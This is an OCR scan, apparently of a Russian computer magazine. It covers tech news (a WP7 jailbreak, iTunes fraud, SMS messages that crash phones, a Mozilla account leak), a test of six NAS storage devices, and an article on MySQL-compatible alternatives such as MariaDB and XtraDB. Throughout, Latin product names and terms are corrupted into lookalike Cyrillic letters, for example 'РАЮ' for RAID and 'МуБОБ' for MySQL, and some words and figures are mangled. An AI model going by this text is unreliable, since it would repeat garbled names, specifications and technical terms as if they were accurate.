лбрейкером вышел сам Брендон Уотсон, 
глава подразделения Місгозоіі по контактам 
с ѴѴР7-разработчи- 



ками. Уотсон писал: «ОеоНоІ, если ты хочешь 
создавать крутые штуки для ѴѴР7, оставь мне 
свой е-таіі, и мы с радостью подаримтебе 
ѴѴР7-телефон!». Да, такова новая «политика 
партии», теперь Місгозоіі предпочитает не 
судиться и скандалить схакерами, а при- 
влекать их на свою сторону. Об одном таком 
прецеденте мы недавно писали:тогда М5 
удалось привлечь создателей СЬеѵгопѴѴР7 
(первого джейлбрейка для ѴѴР7) к обсужде- 
нию вопросов дальнейшего развития мо- 
бильной платформы и убедить парней убрать 
свою утилиту из широкого доступа. 



угоны аккаунтов с прошлогодними накрутками 
рейтинга некоторых приложений в ІТипез? 

Судя по всему, злоумышленники не просто 
пользовались халявой, но методично скачи- 
вали определенные программы, и выводили 
ихвтоп (в основном приложения для чтения 
электронных книг). Когда мошенничество за- 
метили, некоторые приложения были удалены, 
а некоторыелишилисьстатусов бестселлеров. 

В платежной системе РауРаІ, сообщают, что 
возрастающий интерес киберпреступников к 
іТипез является вполнезаконным, однако уве- 
ряют, что большинство случаев мошенничества 
происходитименно на стороне ІТипез, а значит 
и спрашивать нужно с компании Арріе. 
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МЕ6АЫЕѴѴ5 



ЗМЗ МОЖЕТ УБИТЬ 
ТЕЛЕФОН 

Думаешь, заголовокэтой новости выглядел бы уместнее в какой- 
нибудь «желтой» газете? Понимаем, звучит действительно дико- 
вато, но, тем не менее, это правда. Неприятный доклад на данную 
тему был представлен общественности на конференции 2703, что 
недавно состоялась в Берлине. Исследователи Коллин Муллинер 
и Нико Голде рассказали, что многие примитивные мобильные 
телефоны не в состоянии адекватно обработать некоторые виды 
сообщений — например, ММ8 или текстовые месса ги, состоящие 
из нескольких частей. Само по себе это, конечно, не новость, но со- 
общение отом, что после получения такого 8М8 дешевые сотовые 
могут уйти в циклическую перезагрузку — из-за ошибки в ПО — уже 
интереснее. В ходе эксперимента Муллинер и Голде подняли в 
своей лаборатории 08М-сеть, подключили к ней кучу мобильников 
и разослали на них более 1 20 000 8М8’ок. Аппараты, не имею- 
щие собственной ОС, реагировали на получение «непонятных» 
сообщений по-разному — от потери соты до бесконечного ребута. 
Такого рода баги проявилисьу бюджетных устройств от компаний 
Батзипд, 8опу Егісззоп, Моіогоіа и І_6. Теперь исследовали неп- 
розрачно намекают производителям простенькихтрубок, что эти 
уязвимости вполне можно использовать и для 8М8-атак. 





45% всех фишинговых атак приходится на платежную систему РауРаІ. 
Зто излюбленная цель фишеров, согласно отчету ОрепОИЗ. 



РОРШЗАМЗІМ 




Компания Батзипд сообщила о «захвате пальмы первенства» — южнокорейцам 
удалось первыми создать модули памяти ВОР4, используя микросхемы, изготов- 
ленные потехнологии Зх нм класса. Какуже давно известно, основная ставка при 
разработке делалась на энергоэффективность, а не на увеличение скоростей, 
такчто заявление производителя отом, что новые модули потребляютна 40% 
меньше электроэнергии, чем модули БОРЗ, рассчитанные на напряжение 1 .5 В, 
было вполне ожидаемо. Помимо пониженного напряжения питания (модули ООР4 
способны работать при напряжении 1 .05 В) есть и еще один источникэкономии — 
технология Рзеисіо Ореп Огаіп (РОБ), вдвое уменьшающая потребляемый ток во 
время чтения/записи. При этом скорость передачи увеличилась до 2.133 Гбит/с 
при напряжении питания 1 .2 В (для памяти БОРЗ, рассчитанной на напряжение 
питания 1 .35 или 1 .5 В, этот показатель достигает 1 .6 Гбит/с]. Организация ЗЕБЕС 
должна утвердить новый стандарт ООР4уже во второй половинетекущего года. 



УТЕЧКА У М02ІІ1А 



Могіііа Еоипбабоп сообщает, что в Сеть, воз- 
можно, «утекла» база данных, состоящая из 44 
000 неактивных пользовательских аккаунтов, 
ранее использовавшихся на асісіопз.ппогіиа. 
огд . Случилась эта неприятность из-за ха- 
латности самих сотрудников компании — они 
случайно выложили упомянутую базу в откры- 
тый доступ, и до сих пор не понятно, успел кто- 
нибудь ее оттуда стянуть или все обошлось. 

В Могіііа уверяют, что утечка в любом случае 
не представляет никакой угрозы, ведь почти 
вся информация в «слитой» БД уже устарел а, 



а ПО и алгоритмы шифрования сменились 
еще в 2009 году. Тем не менее, база содержала 
логины и пароли пользователей, ктомуже 
зашифрованные еще по старинке — алгорит- 
мом Мй5. Сообщается, что в этой связи все 
дискредитированные пароли принудительно 
поменяли, о чем пользователей уведомили 
по электронной почте. Подобный недосмотр 
компанию Могіііа, конечно, не красит, даже 
несмотря на заявление, что «никакого риска 
для пользователей не было, инцидент не 
вышел за рамки инфраструктуры Могіііа». 




► 014 
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РЕВВІІМ 



ТЕСТОВЫЙ 

СТЕНД 



Процессор: Іпіеі Соге 2 Пио Е4700 
(разогнан до 3500 МГц) 

Системная плата: АЗІІЗ Р50С 
Оперативная память: 2x1024 Мбайт, 
Кіпд$іоп,00К2-800 
Видеокарта: 1№Ш1А беРогсе 9800 СТ 
Блок питания: 430 Вт, ТНегтаКаке 
Операционная система: МісгозоН ѴѴіпбоѵѵз 7 
Шіішаіе х32 



СПИСОК 

ТЕСТИРУЕМОГО 

ОБОРУДОВАНИЯ 

0-Ипк0№-343 
ШСЕАК КеасІуНАЗ ЫѴХ 
ІШРТ5-459 

ЗупоІодуОізкЗіаІіоп 03411+ 
3упо1оду0ізк3іа0оп03410і 
ТІіесиз N3200 



ТЕСТИРОВАНИЕ 
НАКОПИТЕЛЕЙ ИА8 



о Каждый человек, имеющий компьютер и быстрый безлимитный 
интернет, знает о том, что свободного места на диске много не бывает. 
Несмотря на появление моделей НО О емкостью в несколько терабайт, 
проблема все равно остается, тем более, что такие диски весьма дороги. 
Решением может стать ИАЗ - сетевые хранилища данных. 



Технологии 

В аббревиатуре ЫА5 нет ничего страшного: Ыеіѵѵогк АіТасбесІ Зіогаде 
— сетевая система хранения данных. Это удобный корпус для уста- 
новки жестких дисков, обладающий сетевым портом, процессором и 
различными дополнительными интерфейсами. Например, если у тебя 
дома несколько компьютеров, то можно с помощью ЫА5 создать общее 
дисковое пространство, к которому каждый сможет подключиться через 
сеть. Оченьудобно. Но это самый простой вариант, ведь ЫА5 позволяет 
организовать не только банальное хранилище файлов, но и автономный 
загрузчикторрентов, принт- и веб-сервер, почтовый сервер, систе- 
му видеонаблюдения на базе ІР-камер и много другое. Раз уж в ЫА5 
устанавливаются по несколько жестких дисков, то глупо было бы не 
организовать из них дисковый массив потехнологии РАЮ. И, естествен- 
но, такая возможность присутствует. В зависимости от задач, которыеты 
поставишь, можно будет сделать выбор — например, в сторону скорости, 
РАЮ 0 (нотут нужно помнить, что порт Еібегпеі: может стать узким 
местом подобной системы). Если же тебе важна не только скорость, 
но и надежность, то ктвоим услугам массивы уровней РАЮ 1 и РАЮ 5, 
которые используют резервирование данных. Взависимости отналичия 
дополнительных разъемов (115В, еЗАТА и так далее), а также програм- 



много обеспечения из комплекта поставки, возможности конкретного 
ЫА5 существенно возрастают. На некоторых моделях имеются неболь- 
шиеЖК-дисплеи, отображающие различную информацию о параметрах 
работы системы. 

Методика тестирования 

Мы собирали все ЫА5 именно с тремя жесткими дисками по одной 
простой причине: модель Тб ес и з N3200 может вместить в себя 
именно столько НЭЭ — поэтому, чтобы все были в равныхусло- 
виях, мы устанавливали именнопотридиска в каждое сетевое 
хранилище. Это были 2Т6 диски от компании НТасбі. Чтобы понять, 
насколько быстро работает каждая система, нами использовался 
тест Іпіеі ЫА5 Регіюгтапсе ТооІкіЦ который имитирует обычные для 
ЫА5-опе рации, в частности, копирование файлов и папок, работу с 
мультимедийным и бизнес-контентом, а также с потоковым видео. 
Тесты проводились в двух режимах — в массивах уровней РАЮ 5 и 
РАЮ 0. Мы обращали внимание на параметры, такие как скорость 
работы, удобство меню и настройки, комплектация, функциональ- 
ность, внешний вид, комплект поставки и уровень создаваемого при 
работе шума. 
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13500 руб 



р-ипк 

ОЫ5-343 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемые протоколы: СІЕ5/5МВ, РТР, ЭРпР, ЬПр 
Поддерживаемые сервисы: медиа-сервер, принт-сервер, ФггепЫкли- 
ент, ІТипез 

Уровни массивов: РАЮ О, РАЮ 1 , РАЮ 5, ЭВСЮ, ЗіапсІагсІ 

Оперативная память: 1 28 Мб 

Процессор: АРМ926ЕЗ 

Порты: ЕЮегпеі (10/1 00/1 000 Мбит/с], 115В 

+ 

Чтобы установить жесткие диски О-Ыпк ОЫ5-343, не нужно приклады- 
вать много усилий, все сделано оченьудобно: никаких винтов и отверток, 
только направляющие и специальные рычажки на задней панели для 
проведения обратной операции. Также удобен небольшойЖК-экран, на 
котором отображается различная полезная информация, например ІР- 
адрес устройства, количество свободного места и список служб, которые 
запущены в данный момент. Крометого, О-Ыпк ОЫ5-343 — это самое 
недорогое устройство в нашем обзоре. 

Возможно, именно поэтому у него достаточное количество недостатков. 
Это сильный шум при работе, который издают два небольших вентиля- 
тора, а также всего один порт 115В на корпусе. Крометого, высокой ско- 
ростью работы О-Ыпк ОЫ5-343 также не может похвастаться. В общем, 
обратная сторона невысокой стоимости очевидна. 



ЫЕТ6ЕАР 
РеагіуЫАЗ ІЧѴХ 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемые протоколы: СІЕ5/5М В, РТР, ІІРпР, ЬПр, АЕР, N Р5, 
ОЕЫА, Вощоиг 

Поддерживаемые сервисы: медиа-сервер, принт-сервер, Іо ггепЫ кли- 
ент, іТипез, РеабуЫАЗ Ретоіе 
Уровни массивов: Х-РАЮ2, РАЮ 0, РАЮ 1 , РАЮ 5 

Оперативная память: 1 Гб 

Процессор: Іпіеі ЕР80579 1 ГГц 

Порты: 2хЕЮегпеі (10/1 00/1 000 Мбит/с], 3x115В 

■■■■■■■■■□ 

+ 

Внешность РеабуЫАЗ І\ІѴХ нам очень понравилась как из-за дизайна, 
так и из-за качества сборки и материалов. Корпус почти полностью ме- 
таллический, а встроенный блок питания делаетего довольно весомым. 
Каки на некоторых другихучастниках нашего теста, на нем расположен 
Ю 0-дисплей, выводящий информацию о состоянии устройства. Монтаж 
жестких дисков происходит в специальные корзины, что оченьудобно. 
Форматируются диски быстро, настройка проста и понятна. Также стоит 
отметить высокую скорость работы РеабуЫАЗ ЫѴХ, притом, что шум от 
встроенного вентилятора почти неслышен. А если выбрать режим работы 
Х-РАЮ2, то диски можно будетзаменять «по-горячему». 

Единственный обнаруженный нами у РеабуЫАВ ЫѴХ недостаток носит 
конструктивный характер — это слишком яркий светсветоида[02], сиг- 
нализирующего о работе устройства: особенно нервирует в темноте или 
если направлен непосредственно в глаза. 
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симАР 

Т5-459 Рго 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемые протоколы:СІР5/5МВ, РТР, ІЭРпР, ЬКр, АРР, N РЗ, 

□ І_ЫА, Вощоиг, І5С5І 

Поддерживаемые сервисы: медиа-сервер, принт-сервер, Іоггепі- кли- 
ент, ІТипез. 

Уровни массивов: РАЮО, РАЮ1 , РАЮ5, РАЮ6, ПАЮ5+, ЭВСЮ 

Оперативная память: 1 Рб 
Процессор: ІпІеІАіогтЮбІО 1 .66 ГГц 

Порты: 2хЕ*Ьегпе* (10/1 00/1 000 Мбит/с), 5x115В, 2хе5АТА, ѴСА 

■■■■■■■■■□ 

+ 

Свежее устройство от компании ОЫАР обладает очень мощной начинкой 
и широкой номенклатурой портов и разъемов. Это 5 портов ЭЗВ , которых 
слихвой хватит для подключения различных внешнихустройств, два 
разъема еЭАТА, и даже портѴСА. В ОЫАРТ5-459 Рго установлен процес- 
сор ІпІеІАіот с двумя ядрами, тактовой частотой 1 .66 ГГц и поддержкой 
технологии НурегТбгеабіпд. Его органично дополняет 1 Гб памяти типа 
ООР2 — вместе они обеспечивают весьма впечатляющую производи- 
тельность. Также имеется дисплей, на котором можно посмотреть любую 
нужную информацию о работе устройства, а крометого автономно, а не 
через ПК, настроить ЫА5. В этом тебе поможет пара кнопок, расположен- 
ных рядом с экраном. 

А вот цена данного хранилища, мягко говоря, не низкая. Но, как говорит- 
ся, за все нужно платить. 



Зупоіоду 

Ызк 5+атіоп 05411+ 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемыепротоколы: СІР5/5МВ, РТР, ІЭРпР, Шр, АРР, N Р8, 
ОЕЫА, Вощоиг, І5С5І 

Поддерживаемые сервисы: медиа-сервер, принт-сервер, та і [-сервер, 
ІоггепІ-клиент, ІТипез. 

Уровни массивов: РАЮО, РАЮ1 , РАЮ5, РАЮ6, РАЮ5+, РАЮ 1 0, ЭВОЮ, 
Біапсіагі: 

Оперативная память: 1 Рб 

Процессор: I пТеІ Оиаі-соге 1 .67 ГГц 

Порты: Е[бегпе[ (10/1 00/1 000 Мбит/с), 2хЕІ5В, еЭАТА 

■■■■■■■■□□ 

+ 

Модель Эупоіоду Юізк Зіаііоп 0541 1 + отличается высокой скоростью 
работы и наличием множества интересных и полезных функций. С его 
помощью можно организовать почтовый и веб-серверы, причем на пос- 
леднем можно разместить ажтридцать веб-сайтов с поддержкой РНР/ 
Му5СЮ. Крометого, если у тебя есть ІР-ка меры, то с помощью Эупоіоду 
ОІ5к ЗТаТіоп Э541 1 + сможешь настроить систему видеонаблюдения. Не- 
смотря на обилие различных функций работаетустройство очень быстро. 
Крометого, девайс прост в настройке, что позволит им воспользоваться 
даже не самому опытному пользователю.ъ 

Портов и разъемов, в отличие от функций, в Зупоіоду Ю ізк ЗЕаІііоп 0541 1 + 
не очень много: всего лишь пара 115В и один еБАТА. Маловато, учитывая 
направленность решения. Крометого, сосредоточившись на обширных 
возможностяхустройства, производитель немного задвинул работу над 
дизайном, который получился очень простым и скучным. 



► 018 
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Бѵпоіоду 

Ы$к Біатіоп ОБ410| 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемые протоколы: СІР5/5М В, РТР, ИРпР, Шр, АРР, N РЗ, 

□ І_ЫА, Вощоиг, І5С5І 

Поддерживаемые сервисы: медиа-сервер, принт-сервер, 
таіі-сервер, іоггепЮклиент, ІТипез. 

Уровни массивов: РАЮО, РАЮ1 , РАЮ5, РАЮ6, РАЮ5+, РАЮ 10 , ЭВСЮ, 
ЗТапсІагі; 

Оперативная память: 1 28 Мб 
Процессор: АРМ 800 МГц 

Порты: Еібегпеі (10/1 00/1 000 Мбит/с], 2хІЮВ 

■■■■■■■■□□ 

+ 

Второе изделие от компании Бупоіоду в нашемтесте. Стоитоно в два 
раза дешевле, чем его старший брат, но это не помешало производителю 
оставить в нем туже программную составляющую, что и в 0541 1+. А вот 
внешность«младшенького», в отличие от более дорогой модели, ориен- 
тированной на бизнес- пользователей, вполне себе симпатичная: белая 
передняя панель из глянцевого пластика и крышка из серого металла 
производяточень положительное впечатление. Производительность 
Бупоіоду ОізкБіабоп 05410] впечатляет, а два вентилятора работают 
эффективно и тихо. 

Несмотря нато, что Бупоіоду ОізкБіабоп 05410] позиционируется вендо- 
ром как бюджетное устройство, порт 05В на передней панели ему бы не 
помешал. Да и вообще с дополнительными портами беда — присутству- 
ют всего два разъема 115В, и все. 



ТЬеси$ 

N3200 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемые протоколы: СІР5/5МВ, РТР, Ыір, АРР, N55, ОІ_ЫА, 
Поддерживаемые сервисы: медиа-сервер, принт-сервер, 

{оггепЮ клиент, ІТипез. 

Уровни массивов: РАЮО, ВАЮ1 , РАЮ5ДВСЮ 
Оперативная память: 256 Мб 
Процессор: АМ Б беобе 0X800 500 МГц 
Порты: 2хЕ1Ьегпе1(1 0/1 00/1 000 Мбит/с], 2х05В,е5АТА 

■■■■■■■□□□ 

+ 

Устройство выбивается из ряда остальных участи и ков теста, та к как в 
него можно установить всего три жестких диска. Впрочем, учитывая 
его цену, данный нюанс ему можно смело простить, тем более установ- 
ка происходиточень просто. Ктомуже, режим РАЮ5 в ТЬесиз N3200 
производителем оставлен. Аэто означает, что несмотря на всего три 
ИОО, надежное хранилище данных с его помощью вполне можно будет 
создать. Другой особенностью этого девайса является процессорот ком- 
пании АМР. Бюджетность устройства не повлияла на его функционал: 
можно организовать медиа-сервер, клиентзагрузокили принт-сервер, а 
дополнительные модули позволят существенно расширить этот список. 

В общем, недорогой — это не значит плохой или слабый. 

Но, конечно, недостатки у Тбесиз N3200 тоже есть. Это очень простой 
интерфейс, шумная работа системы охлаждения, а также не самая вы- 
сокая скорость работы. Именно этими неудобствами ты должен будешь 
расплатиться за невысокую ценуустройства. 
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Особой разницы с РАЮ5 не заметно 



Выводы 

Думаем, что наш тест позволиттебе выбрать хороший ЫА5, подходящий 
под твои задачи. Награду «Выбор редакции» получил ОЫАРТ5-459 Рго — 
очень быстрая система, обладающая при этом хорошим функционалом. 



Титул «Лучшая покупка» достался модели ТЬесиз N3200 за отличное 
соотношение цены и качества. 

Любители скорости могут обратить свое внимание на еще 
один производительный накопитель, Зупоіоду Оізк Зіаііоп 
05411 + .ЗИ 
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сообщество нового мужского телеканала 



МУЖСКАЯ 

ТЕРРИТОРИЯ 



* По данным исследования ТѴ Іпсіех РІиз, Россия, население 4+ (ТИЗ Россия), октябрь-декабрь 2010 



Реклама 
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о Что будет теперь, когда ненавистная и даже глубоко противная 
истинным сторонникам открытого софта компания ОгасІе купила 
многострадальную Зші, а заодно и наш с тобой любимый МуЗШ.? 
Конец легендарного продукта? Может быть. Но уже сейчас есть куда 
более функциональные и полностью совместимые разработки! 



Му5С!І_, он же просто «мускул». Бьюсь об заклад, что это един- 
ственная СУБД, которая по умолчанию доступна на твоем хостинге. 
Любимые движки для форума и блога работают на ней. Это фак- 
тически стандарт де-факто для любого веб-продукта. Да и в своих 
проектах ты, вероятнее всего, используешь именно ее. В Сети 
миллионы сайтов осуществляют запросы и сохраняют данные в 
БД с помощью Му5СП_. И все было просто и понятно до тех пор, 
пока компанию 5ип вместе с ее любимым мускулом неожиданно 
не купила корпорация ОгасІе. Учитывая, что основным продуктом 
последней является мощнейшая СУБД с одноименным названием, 
сообщество сильно тревожилось о дальнейшей судьбе Му5СН_. И 
не напрасно. Компания ОгасІе, конечно же, выступила с заявлени- 
ем, что все в порядке: проект по-прежнему будет развиваться. Но 
многим верится в это с трудом. Ведь даже быстрый выпуск версии 



5.5, которую многие так ждали, не дал положительных результатов: 
старые баги как были, так и остались. Разве ж это дело? Но парал- 
лельно с оригинальным Му5СН_ уже давно развиваются альтерна- 
тивные проекты, которые совместимы с оригинальной СУБД, но во 
многом даже превосходят ее. И об этом мы сейчас и поговорим. 

Важная вещь — совместимость 

Итак, мы взялись за непростую задачу — найти замену для МуЭОБ. 
Но если менять, то на что? Только не беги с криками «Да отстой ваш 
мускул — бери слона, то есть РозІдгеЭОБ». Не выйдет! Сейчас столь- 
ко кода написано с поддержкой МуЭОЦ что переписать или искать 
замену — себе дороже. Причем в прямом смысле — часто уложиться 
в рамки разумных финансовых затрат просто невозможно. Хорошо, 
если речь идет о простецком форуме или блоге (обычно в них реа- 
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Сервер МагіаОВ 



лизована поддержка сразу нескольких систем). Но что 
если это что-то самописное или заточенное под воз- 
можности именно МуБСІБ? Тут все ох как непросто. Так 
что наша задача — сохранить мускулы (то есть полную 
совместимость с МуБОБ), но прокачать их так, чтобы не 
зависеть от старшего тренера и его стероидов. 
Разработчики и идеологи самого МуБОБ далеко 
не дураки и сами предвидели ситуацию, что после 
поглощения сложно будет всем. Некоторые из них 
решили даже покинуть компанию и основать свои про- 
екты, прихватив тогда еще свободные коды мускула. 
Благодаря этому сейчас есть несколько интересных 
продуктов, основанных на коде оригинального сервера, 
но с большими доработками и изменениями во всем, 
куда только удалось дотянуться разработчикам. Первым 
делом энтузиасты освободились от бремени движка 
ІппоОВ, правами на который уже давно обладает все 
тот же самый Огасіе. На замену ему выкатили несколь- 
ко движков, которые стали доступными в МагіаОВ. 

МагіаОВ 

История этого сервера уходит в далекий 2008 год, когда 
один из главных разработчиков МуБОБ, осознавая, что 
сильно связан поставленными работодателем рамками, 
уволился и основал свою компанию, которая заня- 
лась исправлением родовых травм МуБОБ. Я говорю о 
дефолтном движке МуІБАМ, который необходимо было 
менять, и критических багах, на исправление которых 
уходило неприемлемое количество времени. Что полу- 

Самые крутые в мире специалисты по Му$С1Ц 
имеющие свой собственный сервер 
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чилось у создателей МагіаОВ? Замечательный продукт, 
который на уровне протокола, формата файлов и языка 
БОБ идентичен с оригинальной версией МуБОБ. Это 
предоставляет возможность безболезненного пере- 
хода: без потери данных или изменения логики работы 
имеющегося кода. 

«Но какие бонусы я получу от перехода?», — спросишь 
ты. Взамен мы получаем большую скорость работы и 
новые фичи, которых, возможно, вообще никогда не 
будет в мускуле. Например, интегрированный в сам 
сервер поисковый движок БрЫпх, который не придется 
ставить отдельно, расширенные возможности по бэкапу 
и управлению данными и так далее. 

Надо сказать, что многие очень крупные компании (в 
том числе такие звери, как боодіе и РасеЬоок) давно 
используют МагіаОВ. По сети гуляет специальный 
набор патчей, которые после наложения на исходные 
коды оригинального мускула решают многие проблемы. 
Однако не жди их появления в официальном серве- 
ре — если за столько лет не сподобились, то вряд ли в 
следующей версии решатся. Разработчики МагіаОВ же 
пока свободны от корпоративных правил и маркетинго- 
вых ограничений, поэтому новые патчи и исправления 
багов принимаются достаточно быстро. 

Если оригинальный мускул держится на двух китах — 
движках хранения данных ІппоОВ и МуІБАМ, то МагіаОВ 
использует свои собственные, выступающие продви- 
нутыми заменителями. Движок Агіа пришел на замену 
МуІБАМ и на деле куда более производителен благодаря 
построчному кэшированию и оптимизированному формату 
упаковки данных. Если оригинальный МуІБАМ был быстр 
за счет отказа от транзакций, что означало возможную 
потерю данных, то Агіа одновременно и производителен, 
и безопасен. За счет улучшенных форматов для хранения 
информации МагіаОВ существенно быстрее восстанав- 
ливается после сбоев, не требуя отдельных процедур 
проверки данных после краха. Принадлежащий Огасіе 
движок ІппоОВ заменен на XI; га О В , разработку другой 
компании в области БД Регсопа. Последняя известна 
своими сборками МуБОБ с интегрированными патчами 
от Гугла и Фейсбука, а также расширенными инструмен- 
тами администрирования. Команда имеет необычную 
историю (подробнее ты можешь прочитать во врезке] и 
сейчас активно занимается созданием нового мускула. 
Для обратной совместимости с МуБОБ движок Хіга О В в 
МагіаОВ даже называется точно так же, то есть ІппоОВ. 




[ НТТР://ѴѴѴШ 

I ■ 



> Ііпкз 



• БкуБОБ: зкѵзді.сот ; 

• МагіаОВ: 
тагіасІЬ.ога ; 

• Регсопа: 
регсопа.сопп ; 

• ПгІ77ір- сігіггіе.огд ; 

• МуБОБ: тузді.сопп ; 

• НапсІІегБоскеБ 
ЬіБІѵ/а9В76Ь . 




> іпіо 

Первым проектом 
молодой компании 
Огасіе была раз- 
работка по заказу 
разведчиков учетной 
системы, за которую 
на конкурсе другие 
компании запраши- 
вали п од $2 000 000, 
а молодой Ларри 
Элисон заносчиво 
указал сумму всего 
в $300 000. Стоитли 
говорить, что проект 
был провален, зато 
компания получила 
стартовый капитал 
и начала свое вос- 
хождение. 
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Движок БД — что это такое? 



Если немного упростить понятия, то база данных — это обертка 
вокруг движка хранения данных. Она занимается приемом запро- 
сов и управлением ими, кэшированием и прочими обслуживающи- 
ми функциями, обеспечивая работу с низкоуровневым АРІ движка. 
Последний, в свою очередь, собственно и хранит данные (на диске 
или в памяти], работает с операционной системой и обеспечивает 
выдачу нужных выборок по запросу от сервера. Если раньше СУБД 
(связка «сервер + движок») была монолитная, то теперь во всех 
системах используется структура с плагинами. Движок в такой 
организации является просто модулем, а сам сервер не зависит 
от системы хранения данных. В последних редакциях классиче- 
ского МуБОБ также используется платинная архитектура. Поэтому 
встроенный движок ІппоОВ (правда, обычно устаревшей версии) 
можно легко заменить на модуль другого проекта, который часто 
будет лучше. В альтернативных мускулу разработках, в том числе 
МагіайВ или ОпіЛе, все движки изначально выполнены как пла- 
гины. Попробую кратко пробежаться по современным движкам 
хранения данных в МуБОБ-совместимых СУБД. 

• ІппсЮВ — основной движок для мускула, который с версии 5.5 
наконец-то сделали дефолтным. Поддерживает транзакции, репли- 
кацию, построчную блокировку. Достаточно устойчив к сбоям. 

• ЛАуІЗАМ — очень проблемный движок, плохо переносящий крах 
сервера. Не поддерживает транзакции, но зато может похвастаться 
полнотекстовыми индексами и быстротой работы. Долгое время 
был стандартным для всех версий МуБОБ, а потому до сих пор 
является самым популярным. 

• Агіа — замена для МуІБАМ с поддержкой транзакций и улучшен- 
ной работой с памятью. Движок гарантирует целостность данных и 
при этом не уступает в скорости МуІБАМ. 

• СѴ$ — специализированный движок на случай, когда требуется 
хранить и обрабатывать большие массивы строковых данных, раз- 
деляемых запятой. 

• РесІегаіесІ/РесІегаіесІХ — этот движок специализируется на 
прозрачном разнесении данных по нескольким серверам 
(физическим) на уровне таблицы. 

Но надо понимать, что на самом деле сохранилось только название, 
дабы не смущать софт непривычными идентификаторами. 

Дополнительные движки 

Об ХігаОВ стоит поговорить более детально: по мнению многих спе- 
циалистов это номер один в мире движок для БД. Более того, он 
обставляет оракловский ІппойВ, как маленького :). Ключевая фича — 
долгожданная поддержка многоядерных и многопроцессорных систем, 
чем ну никак не хочет (или не может?) похвастаться МуБОБ. Патчи от 
боодіе давно решили эту проблему, но, как всегда, их не удосужились 
включить в оригинальный движок, поэтому МуБОБ с точки зрения 
производительности плетется далеко позади по любым бенчмаркам. 
Разработчики ХігаОВ значительно улучшили стратегию использования 
дискового 1/0, что раньше ограничивало производительность из-за 
тормозов со сбросом данных на диск из кэша. Соответствующими 
опциями теперь можно тонко управлять из настроек, что позволяет 
особо продвинутым админам подтюнить производительность демона 
самому, не обращаясь к дорогим специалистам по базам данных. Тем 
более, что из коробки доступна детальная статистика по работе движ- 
ка, что сводит на нет потребность в дорогом коммерческом софте для 
анализа производительности базы данных. Нужна лишь одна команда 
5Н0ѴѴ ЕІЧОІІЧЕ I N N 00В 5ТАТБІ5. И немаловажный момент — скорость 
восстановления после сбоя: если уж он и случился, восстановление 
будет не просто быстрым, а почти реактивным, зачастую до десяти раз 
быстрее, чем в МуБОБ. А также множество других мелочей: буферы 
для записей, адаптивные чекпоинты и увеличенное число открытых 
транзакций. Все это позволит серверу хорошо чувствовать себя в 
очень нагруженных условиях. 

Если тебе и этого не хватает, и ты киваешь головой в сторону ЕігеЬігсІ 
или РоздгеБОБ, намекая, что там есть и полная поддержка транзак- 



• РВХТ — призванный заменить ІппоБВ новый движок, в котором 
реализованы полная поддержка транзакций, многоверсионность, 
автоматическая обработка дедлоков. Движок оптимизирован для 
большого количества одновременных транзакций. 

« ВІаскНоІе — служебный движок, представляющий собой, по 
сути, /беѵ/пиіі для СУБД и фактически не производящий никаких 
записей на диск. Используется для репликации. 

• АгсЬіѵе — движок, который максимально быстро работает на 
запись. Используется в тех случаях, когда необходимо хостить 
большие массивы данных. Для эффективности хранения исполь- 
зуется сжатие, что приводит к медлительности во время выборок. 
Движок хорошо подходит для долговременного хранения логов и 
другой служебной информации. 

• ХігаРВ — расширенная и исправленная в некоторых проблем- 
ных местах ІппоБВ от компании Регсопа. 

• МЕРСЕ — схожий с Еебегаіесі движок для разнесения данных в 
одной таблице на несколько разных. 

• МЕМОРУ — движок, использующийся для хранения данных не 
на диске, а в памяти. Информация из базы доступна только во 
время работы сервера, но это дает колоссальный прирост в про- 
изводительности. 

< ВИДОВ — еще одна замена для МуІБАМ с хорошей произво- 
дительностью за счет встроенного построчного кэширования и 
автоматического восстановления после сбоев. Движок не под- 
держивает транзакции. 

• ЫРВ — движок для кластера, обладающий, впрочем, кучей про- 
блем и удручающе плохой производительностью. 

• Раісоп — легендарный движок от компании МуБОБ АВ, раз- 
рабатываемый еще со времен Бип, когда было принято решение 
заменить оракловский ІппоОВ. 

• ЗрЫпхБЕ — полнотекстовый движок от создателя поискового 
сервера БрЫпх. Лучший вариант для полнотекстового поиска и 
индексации по правилам русского языка. Легко оперирует тера- 
байтами данных, обеспечивая при этом все возможности совре- 
менной БД. 

ционной модели и даже МѴСС (МиШѵегзіоп Сопсиггепсу Сопігоі — 
конкурентная модель данных на базе версионности, что позволяет 
без блокировок производить обновление и чтение одной и той же 
строки данных) — расслабься. В МагіайВ доступен движок РВХТ, 
который в некоторых ситуациях еще более крут, чем все вышепе- 
речисленные. Правда, тут сразу стоит сказать, что он не такой уни- 
версальный и его нужно уметь готовить! РВХТ в основном заточен 
под большое количество транзакций, которые пишут или изменяют 
данные, поддерживает быстрый откат и умеет сам разрешать слож- 



Хоть и вышла новая версия, но МуЗСИ уже не торт... 
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Архитектура ЛЛуЗСИ — теперь уже как пособие по устройству некогда великой СУБД 



ные ситуации с блокировками и дедлоками. Например, если хочешь 
сделать хранилище логов, то у тебя будет огромное количество 
операций записи в таблицу, но сравнительно мало чтения. В то 
же время, если кто-то все-таки захочет сделать выборку из БД, он 
получит максимально свежие данные, не мешая при этом записи 
новых. И для совсем уж извращенцев есть движок РебегаІебХ, 
умеющий распределять таблицу данных на несколько физических 
серверов, а также ОСЮРАРН, оптимизированный для хранения 
иерархических структур, графов и деревьев. Подход, идеально под- 
ходящий для создания клона РасеЬоок и ВКонтакте, где требуется 
работать с социальным графом отношений между людьми, что пло- 
ховато вписывается в типичную модель баз данных. 



Откуда взялась Регсопа? 



Жила была компания Регсопа, которая занималась консал- 
тингом в области производительности баз данных. Толковые 
ребята быстро осознали, что на одном только консалтинге 
много не заработаешь, и начали спонсировать разработчиков, 
занимавшихся созданием альтернативы для оригинальной 
Му5СІІ_. Успеху этой затеи способствовало то, что сами же 
спецы из Регсопа понимали проблемы текущей ветки Му50І_ 
как никто другой. Чуть позже компания стала выпускать свою 
версию сервера, включая туда некоторые сторонние патчи и 
продвигая своим клиентам уже исправленную сборку. При этом 
